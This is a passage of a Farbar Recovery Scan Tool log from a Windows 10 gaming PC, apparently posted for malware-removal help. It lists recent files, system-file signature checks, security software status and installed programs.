2016-11-23 17:53 - 2016-11-23 17:53 - 00003376 _____ C:\WINDOWS\System32\Tasks\Norton WSC Integration
2016-11-22 17:44 - 2016-11-22 17:44 - 00001133 _____ C:\Users\Public\Desktop\Sound Capture.lnk
2016-11-22 17:44 - 2016-11-22 17:44 - 00001125 _____ C:\Users\Public\Desktop\Game Capture HD.lnk
2016-11-22 17:44 - 2016-11-22 17:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Elgato
2016-11-22 17:44 - 2016-11-22 17:44 - 00000000 ____D C:\Program Files (x86)\Elgato
2016-11-19 17:08 - 2016-11-19 17:08 - 01047762 _____ C:\Users\Nathan\Downloads\E22-EnglandtoLevel22FALeagueCups2.0.fmf
2016-11-19 16:17 - 2016-11-19 16:17 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2016-11-19 16:17 - 2016-09-09 18:25 - 00269600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2016-11-19 16:17 - 2016-09-09 18:25 - 00261920 _____ C:\WINDOWS\system32\vulkan-1.dll
2016-11-19 16:17 - 2016-09-09 18:25 - 00110880 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2016-11-19 16:17 - 2016-09-09 18:24 - 00125216 _____ C:\WINDOWS\system32\vulkaninfo.exe
2016-11-19 16:15 - 2016-11-17 02:06 - 40123840 _____ C:\WINDOWS\system32\nvcompiler.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 35224632 _____ C:\WINDOWS\SysWOW64\nvcompiler.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 34711096 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 28203576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 10912232 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 10803880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 10354800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 09158432 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 08913328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 08761376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 02953152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 02586048 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 01953336 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6437595.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 01585088 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6437595.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 01038904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00975296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00943552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00897080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00802768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00801560 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00683640 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00644112 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00642576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00617880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00572888 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00438208 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00394888 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00390200 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00384448 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00347072 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2016-11-19 16:15 - 2016-11-17 02:06 - 00327408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2016-11-13 20:57 - 2016-11-13 20:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-12 14:31 - 2016-07-16 11:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-12-12 14:31 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-12-12 14:25 - 2015-09-10 16:31 - 00000000 ____D C:\Program Files (x86)\Steam
2016-12-12 14:21 - 2016-10-07 19:36 - 00000000 ____D C:\Users\Public\Documents\AdobeGC
2016-12-12 14:16 - 2016-08-15 15:26 - 00000000 ____D C:\Users\Nathan
2016-12-12 14:15 - 2015-07-20 11:42 - 01530618 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-12-12 14:14 - 2016-08-15 15:25 - 00000000 ____D C:\ProgramData\NVIDIA
2016-12-12 14:14 - 2016-05-21 21:08 - 00000000 ____D C:\Users\Nathan\AppData\Local\LogMeIn Hamachi
2016-12-12 14:08 - 2016-08-16 12:45 - 00000000 ____D C:\WINDOWS\Minidump
2016-12-12 14:08 - 2016-08-15 15:28 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-12-12 14:08 - 2016-08-15 15:25 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-12-12 14:08 - 2016-04-03 15:17 - 1306966705 _____ C:\WINDOWS\MEMORY.DMP
2016-12-12 14:08 - 2015-11-26 18:10 - 00003025 ___SH C:\WINDOWS\SysWOW64\mmf.sys
2016-12-12 13:56 - 2015-09-10 19:16 - 00000000 ____D C:\Users\Nathan\AppData\Local\Spotify
2016-12-12 13:20 - 2015-09-13 20:46 - 00000000 ____D C:\Users\Nathan\AppData\Local\CrashDumps
2016-12-12 13:20 - 2015-09-10 19:15 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\Spotify
2016-12-12 13:14 - 2016-08-16 12:49 - 00004166 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3958A031-E100-41AE-AE26-61458391320B}
2016-12-12 13:03 - 2015-10-22 14:33 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-12-11 17:06 - 2016-02-20 12:15 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-12-11 17:05 - 2016-07-16 06:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2016-12-11 17:05 - 2015-12-14 21:09 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
2016-12-11 17:05 - 2015-10-24 17:12 - 00001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-12-11 17:05 - 2015-10-24 17:12 - 00001118 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-12-11 17:05 - 2015-09-10 20:34 - 00001375 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-12-11 17:05 - 2015-09-10 20:34 - 00001363 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-12-11 17:02 - 2016-11-10 22:04 - 00003198 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-12-11 17:02 - 2016-11-10 22:04 - 00003170 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-12-11 17:02 - 2016-11-10 22:04 - 00002998 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-12-11 17:02 - 2016-11-10 22:04 - 00002908 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-12-11 17:02 - 2016-11-10 22:04 - 00002866 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-12-11 17:01 - 2016-08-18 13:23 - 00002746 _____ C:\WINDOWS\System32\Tasks\SmartDefrag_AutoAnalyze
2016-12-11 17:01 - 2016-08-18 13:23 - 00002626 _____ C:\WINDOWS\System32\Tasks\SuperbGameBoost
2016-12-11 17:01 - 2016-08-18 13:23 - 00002504 _____ C:\WINDOWS\System32\Tasks\SmartDefrag_Update
2016-12-11 17:01 - 2016-08-16 12:45 - 00002588 _____ C:\WINDOWS\System32\Tasks\FRAPS
2016-12-11 16:54 - 2015-09-10 18:09 - 00000000 ____D C:\Fraps
2016-12-11 16:47 - 2015-09-10 18:11 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\Skype
2016-12-11 16:45 - 2015-10-22 15:06 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\Xfire
2016-12-11 16:36 - 2016-08-28 12:46 - 00000000 ____D C:\ProgramData\Origin
2016-12-11 16:36 - 2015-12-14 22:05 - 00000000 ____D C:\Program Files (x86)\AVG
2016-12-11 16:36 - 2015-09-20 17:12 - 00000000 ___RD C:\Users\Nathan\Creative Cloud Files
2016-12-11 16:36 - 2015-09-20 16:49 - 00000000 ____D C:\ProgramData\boost_interprocess
2016-12-11 16:36 - 2015-09-20 16:46 - 00000000 ____D C:\Users\Nathan\AppData\Local\Adobe
2016-12-11 16:35 - 2016-08-15 16:32 - 00000000 ____D C:\Program Files (x86)\IObit
2016-12-11 16:35 - 2015-09-10 20:33 - 00000000 ____D C:\Program Files (x86)\Google
2016-12-11 16:33 - 2015-09-10 20:33 - 00000000 ____D C:\Users\Nathan\AppData\Local\Google
2016-12-11 16:32 - 2016-01-23 20:22 - 00000000 ____D C:\Users\Nathan\AppData\Local\Battle.net
2016-12-11 16:31 - 2016-08-15 11:54 - 00000000 ____D C:\Program Files (x86)\OSTotoSoft
2016-12-11 16:03 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\rescache
2016-12-11 12:51 - 2016-01-23 20:20 - 00000000 ____D C:\Program Files (x86)\Battle.net
2016-12-11 12:49 - 2015-10-22 15:06 - 00000000 ___SD C:\Program Files (x86)\Xfire
2016-12-11 12:48 - 2016-07-16 11:45 - 00000000 ____D C:\WINDOWS\INF
2016-12-09 22:16 - 2016-07-16 11:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-12-09 21:56 - 2015-07-20 12:36 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-12-09 21:25 - 2016-08-15 15:25 - 04863568 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-12-09 21:18 - 2016-07-16 11:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-12-09 21:18 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\SysWOW64\oobe
2016-12-09 21:18 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-12-09 21:18 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-12-09 21:18 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-12-09 21:18 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-12-09 21:18 - 2016-07-16 06:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-12-09 21:18 - 2016-07-16 06:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-12-09 21:18 - 2016-07-16 06:04 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-12-09 21:18 - 2016-07-16 06:04 - 00000000 ____D C:\WINDOWS\servicing
2016-12-09 21:16 - 2015-09-27 11:44 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\TS3Client
2016-12-09 15:48 - 2016-07-16 11:42 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-12-08 19:47 - 2016-07-16 06:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-12-07 20:29 - 2016-05-06 16:42 - 00000000 ____D C:\Program Files (x86)\Overwatch
2016-12-07 18:18 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-12-07 18:17 - 2016-02-28 17:46 - 00000000 ____D C:\Users\Nathan\AppData\Local\ElevatedDiagnostics
2016-12-06 22:38 - 2016-07-16 11:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-12-06 20:45 - 2016-08-28 12:46 - 00000000 ____D C:\Program Files (x86)\Origin
2016-12-06 20:44 - 2016-04-09 16:33 - 00000000 ____D C:\Program Files (x86)\GalaxyClient
2016-12-03 11:44 - 2015-09-27 11:44 - 00000000 ____D C:\Program Files (x86)\Overwolf
2016-12-03 10:43 - 2015-09-10 18:11 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-12-03 10:43 - 2015-09-10 18:11 - 00000000 ____D C:\ProgramData\Skype
2016-12-02 16:17 - 2015-12-27 11:31 - 00000000 ____D C:\Program Files (x86)\Rockstar Games
2016-12-02 16:16 - 2015-12-26 23:42 - 00000000 ____D C:\Program Files\Rockstar Games
2016-11-30 22:04 - 2016-05-10 18:42 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\discord
2016-11-30 21:55 - 2015-09-26 16:13 - 00000000 ____D C:\Users\Nathan\AppData\Local\Ubisoft Game Launcher
2016-11-24 21:18 - 2016-08-30 16:12 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\uTorrent
2016-11-24 21:04 - 2016-08-03 16:14 - 00000000 ____D C:\Users\Nathan\Desktop\Darthmod shit
2016-11-23 21:01 - 2016-07-16 11:47 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-11-23 17:57 - 2016-11-11 19:26 - 00003940 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-23 17:57 - 2016-11-11 19:26 - 00001485 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2016-11-23 17:57 - 2016-08-15 15:25 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-11-23 17:57 - 2016-08-15 15:25 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-11-23 17:57 - 2016-08-15 15:25 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-11-23 17:55 - 2016-08-15 15:27 - 00000000 ____D C:\Users\Default\AppData\Local\LogMeIn Hamachi
2016-11-23 17:55 - 2016-08-15 15:27 - 00000000 ____D C:\Users\Default User\AppData\Local\LogMeIn Hamachi
2016-11-23 17:53 - 2016-01-02 15:35 - 00002314 _____ C:\Users\Public\Desktop\Norton 360.lnk
2016-11-23 17:53 - 2016-01-02 15:35 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360
2016-11-23 17:53 - 2016-01-02 15:35 - 00000000 ____D C:\WINDOWS\system32\Drivers\N360x64
2016-11-23 17:51 - 2015-09-10 16:01 - 00000000 ____D C:\Users\Nathan\AppData\Local\Packages
2016-11-22 17:44 - 2015-09-10 18:08 - 00000000 ____D C:\Program Files\Elgato
2016-11-19 16:17 - 2016-11-11 19:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-11-17 13:45 - 2016-11-11 19:26 - 01854400 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2016-11-17 13:45 - 2016-11-11 19:26 - 01755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2016-11-17 13:45 - 2016-11-11 19:26 - 01452480 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2016-11-17 13:45 - 2016-11-11 19:26 - 01317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2016-11-17 13:45 - 2016-11-11 19:26 - 00120256 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2016-11-17 13:45 - 2016-11-11 19:24 - 00046016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2016-11-17 02:06 - 2016-08-05 17:35 - 03934504 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2016-11-17 02:06 - 2016-08-05 17:35 - 03474064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2016-11-17 02:06 - 2016-08-05 17:35 - 00042296 _____ C:\WINDOWS\system32\nvinfo.pb
2016-11-17 01:03 - 2016-08-15 15:25 - 06384576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2016-11-17 01:03 - 2016-08-15 15:25 - 02477624 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2016-11-17 01:03 - 2016-08-15 15:25 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2016-11-17 01:03 - 2016-08-15 15:25 - 00546752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2016-11-17 01:03 - 2016-08-15 15:25 - 00392128 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2016-11-17 01:03 - 2016-08-15 15:25 - 00083512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2016-11-17 01:03 - 2016-08-15 15:25 - 00069568 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2016-11-16 16:42 - 2016-11-11 19:25 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2016-11-16 09:52 - 2016-08-15 15:25 - 07529957 _____ C:\WINDOWS\system32\nvcoproc.bin
2016-11-13 22:39 - 2015-09-19 16:58 - 00000000 ____D C:\Users\Nathan\AppData\Local\MEGAsync
2016-11-13 21:41 - 2016-05-21 18:38 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\The Creative Assembly

==================== Files in the root of some directories =======

2016-05-24 19:27 - 2016-05-24 19:12 - 89133056 _____ () C:\Program Files (x86)\CorsairUtilityEngineSetup.MUI_Release_1.16.42..msi
2016-05-24 19:27 - 2016-03-28 19:05 - 0246610 _____ () C:\Program Files (x86)\CUE Patch Notes 1.16.42.pdf
2016-01-01 13:46 - 2016-01-01 13:46 - 0000045 _____ () C:\Users\Nathan\AppData\Roaming\WB.CFG
2015-09-12 22:55 - 2015-09-12 23:06 - 0006144 _____ () C:\Users\Nathan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-02-28 20:51 - 2016-02-28 20:51 - 0000848 _____ () C:\Users\Nathan\AppData\Local\recently-used.xbel
2016-08-15 15:25 - 2016-08-15 15:25 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\Nathan\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Nathan\AppData\Local\Temp\libeay32.dll
C:\Users\Nathan\AppData\Local\Temp\msvcr120.dll
C:\Users\Nathan\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\Nathan\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\Nathan\AppData\Local\Temp\nvStereoApiI.dll
C:\Users\Nathan\AppData\Local\Temp\nvStInst.exe
C:\Users\Nathan\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-07 20:35

==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 07-12-2016
Ran by Nathan (12-12-2016 14:52:23)
Running from C:\Users\Nathan\Downloads
Windows 10 Home Version 1607 (X64) (2016-08-15 15:30:35)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-497135639-785806308-2055428636-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-497135639-785806308-2055428636-503 - Limited - Disabled)
Guest (S-1-5-21-497135639-785806308-2055428636-501 - Limited - Disabled)
Nathan (S-1-5-21-497135639-785806308-2055428636-1005 - Administrator - Enabled) => C:\Users\Nathan

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton 360 (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton 360 (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton 360 (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-497135639-785806308-2055428636-1005\...\uTorrent) (Version: 3.4.8.42576 - BitTorrent Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015 (HKLM-x32\...\{0FAC7130-BEC5-47A5-8813-1D339B8326ED}) (Version: 9.0.2 - Adobe Systems Incorporated)
Adobe Photoshop CS2 (HKLM-x32\...\Adobe Photoshop CS2 - {236BB7C4-4419-42FD-0409-1E257A25E34D}) (Version: 9.0 - Adobe Systems, Inc.)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.2 - Adobe Systems Incorporated)
ALPR+ (HKLM\...\{17D2776A-C637-4D8F-9C33-B7185BFC80D0}) (Version: 1.0.0.0 - Stealth22)
Ansel (Version: 375.95 - NVIDIA Corporation) Hidden
Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
Audacity 2.1.1 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.1 - Audacity Team)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Controller Companion (HKLM\...\Steam App 367670) (Version: - Koga Tech Limited)
Corsair Utility Engine (HKLM-x32\...\{46A3EEB3-8F6F-4BC4-9A53-CDE33D089D08}) (Version: 1.16.42 - Corsair)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version: - CyberGhost S.R.L.)
CyberLink PowerDVD 15 (HKLM-x32\...\{DE85B8F3-D088-4D6E-A970-EE0BC7883A66}) (Version: 15.0.1510.58 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DarthMod Empire (HKLM-x32\...\DarthMod Empire8.0 Platinum) (Version: 8.0 Platinum - )
DarthMod Empire (HKLM-x32\...\DarthMod Empire8.0.1 Platinum) (Version: 8.0.1 Platinum - )
Dead Rising 3 (HKLM-x32\...\Steam App 265550) (Version: - Capcom Game Studio Vancouver)
Discord (HKU\S-1-5-21-497135639-785806308-2055428636-1005\...\Discord) (Version: 0.0.296 - Hammer & Chisel, Inc.)
Dishonored (HKLM\...\Steam App 205100) (Version: - Arkane Studios)
Elgato Game Capture HD (HKLM\...\{4281A206-158E-4C28-B078-397188759F60}) (Version: 3.20.33.1533 - Elgato Systems GmbH)
Empire Total War Minor Factions Revenge (HKLM-x32\...\Empire Total War Minor Factions Revenge) (Version: v31.01.2014 - Modding by Itan)
FaceCam 311 (HKLM-x32\...\{6A7E688F-A6CC-49B1-8F24-25634B56F1E1}) (Version: 1.0.1.8 - KYE)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version: - Bethesda Game Studios)
FontForge version 27-08-2015 (HKLM-x32\...\{56748B9C-19AE-4689-B8C5-5A45AE0A993A}_is1) (Version: 27-08-2015 - FontForgeBuilds)
Football Manager 2016 (HKLM-x32\...\Steam App 378120) (Version: - SEGA)
Football Manager 2016 Editor (HKLM\...\Steam App 378200) (Version: - )
Football Manager 2017 (HKLM\...\Steam App 482730) (Version: - Sports Interactive)
Football Tactics (HKLM\...\Steam App 375530) (Version: - Creoteam)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
Free2X Webcam Recorder 1.0.0.1 (HKLM-x32\...\Free2X Webcam Recorder_is1) (Version: - )
Game Capture HD v2.3.3.40 (HKLM-x32\...\Software_Elgato_Game Capture HD) (Version: 2.3.3.40 - Elgato Systems)
Game Capture HD60 Pro v1.1.0.149 (HKLM-x32\...\Software_Elgato_Game Capture HD60 Pro) (Version: 1.1.0.149 - Elgato Systems)
Game Capture HD60 S v1.1.0.160 (HKLM-x32\...\Software_Elgato_Game Capture HD60 S) (Version: 1.1.0.160 - Elgato Systems)
Game Capture HD60 v2.1.1.4 (HKLM-x32\...\Software_Elgato_Game Capture HD60) (Version: 2.1.1.4 - Elgato Systems)
Game Dev Tycoon (HKLM\...\Steam App 239820) (Version: - Greenheart Games)
GameSpy Arcade (HKLM-x32\...\GameSpy Arcade) (Version: - )
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version: - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Grand Theft Auto III (HKLM-x32\...\Steam App 12100) (Version: - Rockstar Games)
Grand Theft Auto V (HKLM-x32\...\{E01FA564-2094-4833-8F2F-1FFEC6AFCC46}) (Version: "1.00.0000" - Rockstar Games)
Hearts of Iron IV (HKLM\...\Steam App 394360) (Version: - Paradox Development Studios)
ICBM version 1.4 (HKLM-x32\...\{1C682CD6-B923-4AE2-8F64-F28063CE94A0}_is1) (Version: 1.4 - REPVBLIC)
Intel(R) Chipset Device Software (x32 Version: 10.0.17 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.2.1000 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
LMMS 1.1.3 (HKLM-x32\...\LMMS) (Version: 1.1.3 - LMMS Developers)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.541 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.541 - LogMeIn, Inc.) Hidden
Lords of Football (HKLM\...\Steam App 230650) (Version: - Geniaware Srl)
LSPD First Response (HKLM-x32\...\LSPD First Response) (Version: 0.3.1 - G17 Media)
Mad Max (HKLM-x32\...\Steam App 234140) (Version: - Avalanche Studios)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Men of War: Assault Squad 2 (HKLM-x32\...\Steam App 244450) (Version: - Digitalmindsoft)
METAL GEAR SOLID V: THE PHANTOM PAIN (HKLM-x32\...\Steam App 287700) (Version: - Konami Digital Entertainment)
